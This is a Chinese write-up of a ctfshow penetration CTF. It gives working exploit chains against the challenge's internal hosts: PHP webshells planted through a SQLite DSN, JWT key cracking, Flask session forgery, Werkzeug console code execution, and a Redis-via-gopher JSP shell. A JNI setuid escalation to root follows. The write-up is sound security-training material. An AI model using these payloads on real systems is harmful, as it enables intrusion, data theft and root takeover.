2025ctfshow元旦渗透赛 第一章 flag1-压缩包 压缩包密码爆破
flag2-图片-密码 压缩包里面有个图片
PNG 文件的尾部标识符
49 45 4E 44 AE 42 60 82
提取出 IEND 标识之后多余的数据,base64 解码👇得到下面这段脚本:
# NOTE(review): this is the script recovered from the data appended after the
# PNG IEND marker. It installs a package *by name* from whatever package index
# pip is configured with (PyPI by default) and then imports it -- i.e. it runs
# arbitrary install-time and import-time code from an unknown third party.
# Treat it as untrusted: download and inspect the package first
# (`pip download secretMessageResponse`), and run it only in a disposable VM.
if __name__ == '__main__':
    try:
        import secretMessageResponse
    except ImportError:
        import pip
        # pip.main() is not a supported API and fails on modern pip versions;
        # `python -m pip install ...` is the documented way to do this.
        pip.main(['install', 'secretMessageResponse'])
    from secretMessageResponse import printMessage
拿 python 运行一下没出来,只有一堆数据。注意:这个脚本会自动 pip install 一个来源不明的第三方包(安装和导入时都会执行包内代码),只应在隔离的虚拟机里跑,先去查看这个库的内容👇
去找库👇
pip show secretMessageResponse
crypto 环境问题:`from Crypto.PublicKey import RSA` 报 `ModuleNotFoundError: No module named 'Crypto'`。解决方法:(1) 安装 pycryptodome:`pip install pycryptodome`。如果 site-packages 中已经存在 crypto、pycrypto,需要在 pip install 之前先 `pip uninstall crypto`、`pip uninstall pycrypto`,否则会因为同名冲突而无法正常安装(pycrypto 早已停止维护,不要再装它)。(2) 安装完成后如果仍然导入失败,把 site-packages 中 crypto 文件夹的首字母 c 改为大写的 C —— 这只是一个临时绕过,说明磁盘上残留了大小写不同的同名目录;更稳妥的做法是删掉残留目录后重新安装 pycryptodome,手工改名会让 pip 的元数据和磁盘状态不一致。
# Derive the RSA private key (求私钥) from the recovered factors p and q.
# n and e are the challenge's public-key parameters (see the public-key
# extraction script further down); p and q are its factors. The private
# exponent is d = e^-1 mod phi(n). RSA.construct() runs a consistency check
# on the tuple by default, so a mistyped digit in p, q or n is expected to
# raise ValueError instead of silently producing a wrong key.
from Crypto.PublicKey import RSA

p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
n = 633246888504573920779824237508007735589231666589188021171575950939940255140086052090801972411182075806200277922264916256376952068104942084262732765302869757002336862151158422906662985191392193462511289187123754337854684702016396996198789908170728175626225281406256476216079863574750768787169969475152717430903460149705597463505143799487488630064694962535355825378265518133414832135165998125004282912865895836379205933895029154287788824317000843771251331435939410389957572552746410933103347212260533351406876584798128116835102705770834548333327952204414218313396767348386545933700371706780732081128764732828398879654027694999061445888984652196057717761623666471390226500419047354546009526849190038055817008252022472857695300387827500818231719929626707573775972451255428059119840669826086027702546510213791864358183204530776020004866770536545695330324167569777791175170044812028227494966458864002660598592490354017639158027968836329598282419666463285900175674408026881052737148611395153194390130628356104784358804158581294733196703476913434055209441802708485723455322985654447400945734717510509951259155462497189459983874690099575241597111904193711108488616566486665053884629084564364205319797812148684173057523812840684555544241901417
e = 0x10001

# Other parameters: Euler's totient and the private exponent.
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)  # modular inverse via three-argument pow (Python 3.8+)

# Build the private key object and print it as PEM.
# NOTE(review): this prints the unencrypted private key to stdout -- fine for
# a CTF, but keep it out of shared logs / pastes.
key = RSA.construct((n, e, d, p, q))
private_key = key.export_key()
print(private_key.decode('utf-8'))
求公钥
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization


# The challenge's PEM public key. Extract (n, e) so they can be checked
# against the factors p and q used in the private-key script.
pem_blob = b"""
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAmziayo9Tddo1FYdrtOsw
yjLYJ5frYKEwm4rQTsKU8UcdnnDRgms+ZmStoqlH/qi6x+D1K3fvvioCnGZLFHZw
BUqbgT5x+qUmUaVMll9FOT7ZJ05w8n8Ljqa1akzFMU5G7YbCr3vQwN63vwvD9/63
TDbXkJrv1fGl2rHpPwp5OPCUeCB3nIFIRCWHpJU7sHJqIP5vzV8KNJtbxgR+dhsz
dg+NhoBDUpxoVN5lzSKr2TMOLFLZaQR9AWOV/aHV8gjTkTLDZfc+XlfhxiDMTQdi
UTbk/tynpt+JFrDA8vL5/TOmuxgumqgXZIPGrIUbwloTYyHD/XXmvXu5KE8g3eMK
gxNxuEKM5bMTESBK9A7Q2Kj3eNp0Rvb5Aleg7h8/YbQemGelY/o5xpUyHgHjsfNQ
3j/xhdhVCNVaXZF64V/YVpvC9Cq29F7qI+bl6FlN7zSpuHB3QgNS1uXOmjBCsA7y
pZoWmdXeaLIO+I3kP48BBSmue4nidJifiK/kSOcZ0iegRXV1hyZ6pYdDE7hM5V5t
5tvayJ31zRQNT2ALAFeCDozVWELHTnphkPkQO+SOPglrVz0S1dXicqRofXWMj7PJ
OFkBpWIX0aywMIh1woEAawUs3RM2pfLUNtqUTfodSCmWlwcpGrBWG5NACx7csPFt
zWn8oPZfzL346at5DDIwD2kCAwEAAQ==
-----END PUBLIC KEY-----
"""


def _public_numbers(pem: bytes) -> tuple[int, int]:
    """Parse a PEM-encoded RSA public key and return its (modulus, exponent)."""
    loaded = serialization.load_pem_public_key(pem, backend=default_backend())
    numbers = loaded.public_numbers()
    return numbers.n, numbers.e


# Print the modulus and the public exponent.
n, e = _public_numbers(pem_blob)
print("模数(n):", n)
print("公钥指数(e):", e)
解密脚本
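from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse
import base64

# The RSA-OAEP ciphertexts recovered from the challenge, keyed by the
# inputMessage_<date> name they were found under. Every value is base64 text.
message = {
    "inputMessage_20241216": '''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''',
    "inputMessage_20240411": '''Z93Khatj+AWZcpPwIqu8LzbJ8xb8CuVMI8okE0qwoQD2IC2lixg77mJZireOrbW7zFkDsk1hP67dROJZwVUDrYot2g5GxX/xy7lGjIblUX4iJVUtP4mHqZUgKROaLoh/gippMpP+8Ik2X/QRBx5gdhq0xam+wuVC+77/tyu8Fd/DohKbAMp8aaJsFr/W4mLDZ1gv4JK+2O3l+bAvpodBRTzb0ld5zD2ueYvjTudoDjdanQP1oVTH7pkDO2Vb+SsdIyTi2C410JEOF4Qm8mzVHtiOunOcLVpAlQsM6/LdhqsTNelXl/Myb84NGxwGWVmx6j2QejiL7S1hHeHlmQ9ExHeURPdZAvKhgMCemYXu3BGlFq3ydb5SkqwLFvM4vJ6XUBcWkHT8eijBFF6Y7YgOv9GRvBTnsAQhUBp4W4EAMtXkDdToG+S8ZO7El8Gh8jaWC49n5CuUBRz3z2GeOVbsBamfLV06IO5v78jGHXig4saEFKHvYSIGewyUCVQEGoIR5xOTJBTUTePAdvQjfg28vZZxFB/hIYNDUHkaek1Mg1UH5HWGgsCX1In5hSX/9eBkznEhzeWnJ1yMsYkj+ddN34DLQSrHc83geXMcoW3Ah3cAQG8E8bszvKL3hme+T5rOeENjkOAgYhf84k4YlxDskdwvzyu8HkE9CSaBpDP6lKI=''',
    "inputMessage_20240305": '''ckDSthpl5DDJMpBE26Jqk8EjaSq7MUntdwLHPouwx6D38un6WQfLJ9wgDyjh9GA/ICJR7WrwWsVinr6y3u9w+ubMZ0mqmtnphzQraagk8NkKc1u1+qGp8llsud3C8mvJWa4GYa9KEhnACDHwppPKJDCfr1HKwPbR0NIi+1Aunmy6DeOKRkFwysnrSco5QiiC9+gdXFhQDmN9KEiYW6Pc3mWVbqFiJgRW3/Df6638oGPm6AUcgRnEWMKiluyN81frM9VNtCeJ64YrU6Rgx4D153YxNNQbLTcyCQMamHTrJnhxPojkuDqbEcU+iiN4offwrQyr4eEu9ecvmyD2w/n7pAOsVnqSzroBujVA+CK6Zq8Uie15mL5yWG9hD5ZcbSwnRmtqK3yl0Xl91hgn1JqcIEKtf+MnMQPr80uoxT3mz8IX8pyVnyyw1x6F+IK1I2G+5w6rUDjhzIbME5XB9hopwcswsXrMo9PP6/5Sz1noJrsu6k6WN8ZM0MyRIav+xuKP1+cYzlPSQZrMo3L4ieHQnBbsoyzGVf9QONMwaooGOrxu88ZWlGe8e7eyCzteeNSVOC2zqtQiwQJIgfp2UwTymA/cEjOICWVzUXwbE5wWUBPCLp2C/XWc82byrOHAFXHLOVKgolVToUpZ5uOvizgk/ahaxdGxGa9CrRyr6sf+goA=''',
}

# Recovered factors of the public modulus (same p, q as the private-key script).
p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
n = p * q
e = 0x10001
d = inverse(e, (p - 1) * (q - 1))

# Build the private key with PyCryptodome and hand the PEM bytes straight to
# `cryptography` for OAEP decryption. The key stays in memory: the original
# round-tripped the unencrypted private key through out.pem on disk, which
# is an unnecessary place for key material to end up (and the variable was
# misleadingly called `pub`).
priv = RSA.construct((n, e, d, p, q))
private_key = serialization.load_pem_private_key(
    priv.exportKey('PEM'), password=None, backend=default_backend()
)

# RSA-OAEP with SHA-256 as both the hash and the MGF1 hash -- the padding
# the original script decrypted with. Each plaintext is itself base64 text,
# hence the second b64decode before printing.
oaep = padding.OAEP(
    mgf=padding.MGF1(algorithm=hashes.SHA256()),
    algorithm=hashes.SHA256(),
    label=None,
)
for name, ciphertext_b64 in message.items():
    # Distinct name for the plaintext: the original rebound `message` inside
    # the loop, shadowing the dict being iterated.
    plaintext = private_key.decrypt(base64.b64decode(ciphertext_b64), oaep)
    print(base64.b64decode(plaintext).decode())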
得出
1 2 3 4 5 6 7 8 9 Park: 你的行动已经暴露,24小时内迅速撤离,销毁所有资料,将现有资料统一上传到【任务中心】 发送人:Dylan Park: 总部已经为你安排新的身份,请务必在3日内抵台,你的新身份是新竹县动物保护防疫所网络安全顾问,【任务中心】账号密码和你任职单位网站的数据库用户名密码一致,请尽快修改 发送人:Dylan Park: 【任务中心】网址已变更为 https://task.ctfer.com ,请注意修改浏览器地址栏中的链接 发送人:Dylan
flag3-wp漏洞+基础账户 从这突然好玩了起来
根据2的提示去获得账号密码
根据对应的网站进入数据库查询;网页源代码显示站点是 WordPress,
扫一扫查一查
1 https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b/
漏洞验证
1 ?aam-media=wp-config.php
1 ctfshow{hsinchug_wp1_Q.4Vyj8VCiedX1KYU5g05}
第二章 flag4-jwt伪造+第二个账户
查看电话号码的地方可以抓包,根据提示是jwt,key在火堆里面
4a4f7d6e8b5 ?0c7f
4a4f7d6e8b5e3a0c7f
爆破(hashcat 的 -m 16500 是 JWT 模式;key 中缺失的 3 个字符在 mask 里用 ?1?1?1 占位,--custom-charset1=?l?d 把候选集限定为小写字母+数字,结果就是上面的 e3a)
1 2 3 hashcat -a 3 -m 16500 hash.txt --custom-charset1=?l?d 4a4f7d6e8b5?1?1?10c7f eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoc2luY2h1Z193cDEiLCJleHAiOjE3MzY3NzIyNTV9._fw255qGHn4l9BtB6Uw2AifVgb9Z5xd7Grl41Q7S7LU
出结果
flag5-文件读取+root账户+app.py.bak(含密码)。拿新的身份去查看新的 admin 功能并抓包:一个接口用来遍历文件,一个用来查看文件内容
访问init_users.json获得flag
flag6-ssrf+secret_key 在Server Info
菜单发现内网IP地址
有个download task file的页面可以试试内网访问
ctfshow{0x8F7C71E8E82E4D1E}
第三章 flag7-SSRF 传码获取 shell:目标的 PDO DSN 可控,用 `dsn=sqlite:xxx.php` 让 SQLite 在 web 目录里创建数据库文件,再通过建表/插入把 PHP 代码写进文件内容(SQLite 写码)
1 ?dsn=sqlite:shell.php&username=aaa&password=bbb&query=create table "aaa"(name TEXT DEFAULT "<?php file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");
没好使,用的下边的
1 2 3 4 5 http://172.2.198.5/?username=1%26password=1%26query=CREATE TABLE users (name TEXT);%26dsn=sqlite:b.php http://172.2.198.5/?username=1%26password=1%26query=INSERT INTO users (name) VALUES ('<?php file_put_contents("4.php","<?php system(\$_GET[0]);?>");?>');%26dsn=sqlite:b.php http://172.2.198.5/b.php http://172.2.198.5/4.php?0=ls; http://172.2.198.5/4.php?0=cat config.php;
法二 原内容
1 %3fdsn=sqlite:shell.php%26username=aaa%26password=bbb%26query=create%20table%20"aaa"%20(name%20TEXT%20DEFAULT%20"<?php%20file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");
输入
1 http://172.2.198.5/%3fdsn=sqlite:shell.php%26username=bbb%26password=bbb%26query=create%20table%20%22bbb%22%20(name%20TEXT%20DEFAULT%20%22%3C?php%20file_put_contents(%271.php%27,%27%3C?php%20eval($_GET[1]);?%3E%27);?%3E%22);
再访问 shell.php:虽然会报错(文件主体是 SQLite 数据库),但 PHP 解析到了其中嵌入的 `<?php file_put_contents(...) ?>`,1.php 已经被写进去了;随后直接访问 1.php 即可
flag8-眼看 根目录有个secret.txt打开,里面有邮箱账号+密码的base64
网易邮箱登录可以看到81192
第四章 flag9-session伪造-ssrf+key 打.6:8888进去就会给个session,访问/key会拒绝,伪造一个
根据 flag5 处 app.py.bak 的源码,用已经拿到的 secret_key 伪造一个 Flask session(下面用 flask_session_cookie_manager 先解码现有 cookie,再以 admin 身份重新签名):
1 python flask_session_cookie_manager3.py decode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -c eyJ1c2VyIjoiZ3Vlc3QifQ.Z4dF3w.FEE9qzWhV0dbFQ-ZNfYo7eqpr6o
1 python flask_session_cookie_manager3.py encode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -t "{'user': 'admin'}"
1 eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY
再通过刚才在 .5 上获取的 shell(4.php)去 SSRF 内网的 .6:8888,带上伪造的 session 访问 /key:
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/key"
flag10-flask日志文件getshell 思路
查看werkzeug的源码
Werkzeug 是一个用 Python 实现 WSGI 规范的工具库(Flask 的底层依赖),这里要打的就是它自带的调试器 /console。
WSGI 是 Python Web 服务器与 Web 应用(框架)之间的接口规范,不是服务器和客户端之间的协议。
curl 的 -v 选项启用详细模式(打印请求和响应头,便于看到 Set-Cookie)。
**-c cookie.txt**:这个选项指定 curl 在完成请求后,将从服务器返回的 Cookies 保存到 cookie.txt 文件中。
**-b**:这个选项用来指定 curl 发送请求时使用指定的 Cookie(字符串或 Cookie 文件)。
操作 法三 附上脚本
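import base64
import requests

# Interactive wrapper around the chained path used for flag10:
#   us -> /downloadTaskFile (SSRF on the challenge front end, needs the
#   "dylan" JWT) -> http://172.2.198.5/1.php (the PHP webshell written
#   earlier) -> system(base64_decode(<cmd>)).
# The command is base64-encoded so shell metacharacters and quotes never
# have to survive two nested URLs.
TARGET = "http://6bcb3e8b-f3e3-4103-86b7-e8d9a9df8f92.challenge.ctf.show/downloadTaskFile"
INNER_SHELL = "http://172.2.198.5/1.php"
# Challenge-scoped bearer token (sub=dylan); remove before reusing this script.
JWT = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJkeWxhbiIsImV4cCI6MTczNzAwNTIwOH0.6I2CU7u2c96zkz_HhdEg2NvuvwdvLSsAjfIom3b80Jw"

while True:
    data = input("> ")
    encoded = base64.b64encode(data.encode()).decode()
    # Same URL shape as the original; the quotes around the base64 go out raw.
    url = f'{TARGET}?url={INNER_SHELL}?1=system(base64_decode("{encoded}"));'
    try:
        # verify=False: the challenge endpoint's certificate is not trusted by
        # the local store. Never do this against a real target.
        response = requests.get(url, verify=False, headers={'Authorization': f"Bearer {JWT}"})
        print(response.json()["file_content"])
    except (requests.RequestException, ValueError, KeyError):
        # Narrowed from a bare `except:`, which also swallowed KeyboardInterrupt
        # and made the loop impossible to leave with Ctrl-C. ValueError covers
        # a non-JSON body, KeyError a response without file_content.
        print("Error")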
修改日志
1 /set_log_option%3flogName=werkzeug%2526logFile=main.log
获取console的密码
1 2 3 /console 21hr1yWBaAg5kQrHGHW
写入
1 curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl"
查看
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
获取pin码
1 2 /set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl 143-535-858
验证
1 curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"
保存cookie
1 curl -c cookie.txt -v -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"
利用cookie命令执行
1 curl -v -b "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=__import__('os').system('''cat%20\/etc\/passwd>.\/log\/main2.log''')&frm=0&s=21hr1yWBaAg5kQrHGHWl"
没写进去(用 __wzd 调试器 cookie 直接 os.system 重定向没生效),换成通过 1.php 的 shell 把同一条 curl 用 base64 包起来再发一次:
1 http://172.2.198.5/1.php?1=system(base64_decode('Y3VybCAgLXYgLWIgICJfX3d6ZDgwNWJkYTg2MDM3ODdhMTI0MmNkPTE3MzY5MjY0MDJ8MTJhMzJjOTc4YTI2IiAiaHR0cDovLzE3Mi4yLjE5OC42Ojg4ODgvY29uc29sZT9fX2RlYnVnZ2VyX189eWVzJmNtZD1vcy5zeXN0ZW0oJycnY2F0JTIwXC9ldGNcL3Bhc3N3ZD4uXC9sb2dcL21haW4yLmxvZycnJykmZnJtPTAmcz0yMWhyMXlXQmFBZzVrUXJIR0hXbCI='));
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main2.log"
读取
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
1 curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
直接读:在 console 里用 popen 读出回显,不用再绕日志文件
1 curl -v -b "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=print(__import__('os').popen('cat%20\/etc\/passwd').read())&frm=0&s=21hr1yWBaAg5kQrHGHWl"
第五章 flag11 直接访问7的8080端口,是Jetty Server
敏感文件读取
curl -v "dict://172.2.182.7:6380/auth:ctfshow_2025"
1 2 3 4 5 2. 再传码 1. ``` http://172.2.182.5/1.php?1=system(base64_decode('Y3VybCAgLXYgICJnb3BoZXI6Ly8xNzIuMi4xODIuNzo2MzgwL19hdXRoJTIwY3Rmc2hvd18yMDI1JTBBc2V0JTIwbWFycyUyMCUyMiUzQyUyNSUyMFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3JTIwU3RyaW5nJTVCJTVEJTdCJTVDJTIyc2glNUMlMjIlMkMlNUMlMjItYyU1QyUyMiUyQ3JlcXVlc3QuZ2V0UGFyYW1ldGVyKCU1QyUyMmNtZCU1QyUyMiklN0QpJTNCJTI1JTNFJTIyJTBBY29uZmlnJTIwc2V0JTIwZGlyJTIwJTJGb3B0JTJGamV0dHklMkZ3ZWJhcHBzJTJGUk9PVCUyRiUwQWNvbmZpZyUyMHNldCUyMGRiZmlsZW5hbWUlMjAyLmpzcCUwQXNhdmUlMEFxdWl0Ig=='));
读取文件
上面的 gopher:// 请求向 .7:6380 的 Redis 依次发送 auth、set(值为 `<% Runtime.getRuntime().exec(new String[]{"sh","-c",request.getParameter("cmd")}); %>`)、config set dir /opt/jetty/webapps/ROOT/、config set dbfilename 2.jsp、save,把 RDB 文件直接写进 Jetty 的 web 目录当作 2.jsp。发现命令没有回显,于是把输出重定向到 web 服务目录 /opt/jetty/webapps/ROOT/ 下的文件再访问读取
2.jsp?cmd=ls%20/>/opt/jetty/webapps/ROOT/success.txt
1 2 3 3. ``` 2.jsp?cmd=cat%20/dylan.txt>/opt/jetty/webapps/ROOT/success.txt
flag13
查询cap权限
getcap%20-r%20/%202>/dev/null>/opt/jetty/webapps/ROOT/success.txt
/usr/local/openjdk-8/bin/java = cap_setuid+ep —— java 二进制带有 CAP_SETUID 且为 effective,任何由它启动的 JVM 都可以通过 setuid(0) 切换到 root,这就是下面 JNI 提权的前提
setuid提权
写setuid.c
2.jsp?cmd=echo%20"I2luY2x1ZGUgPGpuaS5oPgovLzExMTExMTExMTExMjIKI2luY2x1ZGUgPHVuaXN0ZC5oPgoKSk5JRVhQT1JUIGppbnQgSk5JQ0FMTCBKYXZhX1NldFVJRF9zZXRVSUQoSk5JRW52ICplbnYsIGpvYmplY3Qgb2JqLCBqaW50IHVpZCkgewogICAgcmV0dXJuIHNldHVpZCh1aWQpOwp9"%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.c
#include <jni.h>
#include <unistd.h>

/*
 * JNI bridge for the cap_setuid privilege escalation (flag13). The target's
 * java binary carries cap_setuid+ep (see the getcap output above), so a
 * native setuid(0) issued from inside that JVM is expected to succeed and
 * the JVM keeps running as root. Built into libSetUID.so with the gcc
 * command in the "编译" step below.
 *
 * The symbol name must stay Java_<class>_<method> to bind to
 * `public native int setUID(int uid)` in SetUID.java.
 *
 * env, obj: standard JNI parameters, unused here.
 * uid:      target uid (0 for root).
 * Returns the raw setuid() result: 0 on success, -1 on failure.
 */
JNIEXPORT jint JNICALL Java_SetUID_setUID(JNIEnv *env, jobject obj, jint uid) {
    return setuid(uid);
}
setuid.java
2.jsp?cmd=echo%20"cHVibGljIGNsYXNzIFNldFVJRCB7CiAgICBzdGF0aWMgewogICAgICAgIFN5c3RlbS5sb2FkTGlicmFyeSgiU2V0VUlEIik7IAogICAgfQoKICAgIHB1YmxpYyBuYXRpdmUgaW50IHNldFVJRChpbnQgdWlkKTsgCiAgLy9hCiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTZXRVSUQgc2V0VUlEID0gbmV3IFNldFVJRCgpOwogICAgICAgIGludCByZXN1bHQgPSBzZXRVSUQuc2V0VUlEKDApOyAKICAgICAgICBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKG5ldyBTdHJpbmdbXXsic2giLCItYyIsImNhdCAvcm9vdC8qLnR4dD4vb3B0L2pldHR5L3dlYmFwcHMvUk9PVC9yb290LnR4dCJ9KTsKICAgIH0KfQ=="%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.java
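/**
 * Privilege-escalation helper for flag13: the target's java binary carries
 * cap_setuid+ep, so a JVM started from it can call setuid(0) through JNI
 * (libSetUID.so, see SetUID.c) and keep running as root.
 *
 * Run with -Djava.library.path pointing at the directory holding libSetUID.so.
 */
public class SetUID {
    static {
        System.loadLibrary("SetUID");
    }

    /** Calls setuid(uid) in libSetUID.so; returns 0 on success, -1 on failure. */
    public native int setUID(int uid);

    public static void main(String[] args) throws Exception {
        SetUID setUID = new SetUID();
        int result = setUID.setUID(0);
        // Bail out if the capability is missing or was dropped: otherwise the
        // cat below silently runs as the JVM's original user and an empty
        // root.txt gets misread as "no flag".
        if (result != 0) {
            System.err.println("setuid(0) failed; check getcap on the java binary");
            return;
        }
        // Fixed from the writeup's `Runtime.getRuntime.exec(...)`, which does
        // not compile (getRuntime is a method). The JSP shell gives no echo,
        // so the output is written into the webroot and fetched over HTTP.
        Runtime.getRuntime().exec(new String[]{"sh", "-c", "cat /root/*.txt>/opt/jetty/webapps/ROOT/root.txt"});
    }
}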
编译
2.jsp?cmd=javac%20/opt/jetty/webapps/ROOT/SetUID.java
编译 JNI 动态库(shell,通过 2.jsp 执行;${JAVA_HOME} 由目标上的 sh -c 展开):
2.jsp?cmd=gcc%20-shared%20-fPIC%20-o%20/opt/jetty/webapps/ROOT/libSetUID.so%20-I${JAVA_HOME}/include%20-I${JAVA_HOME}/include/linux%20/opt/jetty/webapps/ROOT/SetUID.c
执行
2.jsp?cmd=java%20-Djava.library.path=/opt/jetty/webapps/ROOT/%20-cp%20/opt/jetty/webapps/ROOT/%20SetUID
https://chenxi9981.github.io/ctfshow_%E5%85%83%E6%97%A6%E6%9D%AF/
https://www.cnblogs.com/LAMENTXU/articles/
https://ysynrh77rj.feishu.cn/docx/F3nJdGJHjo1DSBx8c2TcecLrnvh
## 评价
挺难的,感觉靠我自己是做不出来的。
疑惑点是 flag10 和 flag13 这两处,13 是真不会;先把 payload 记下来,下回直接用。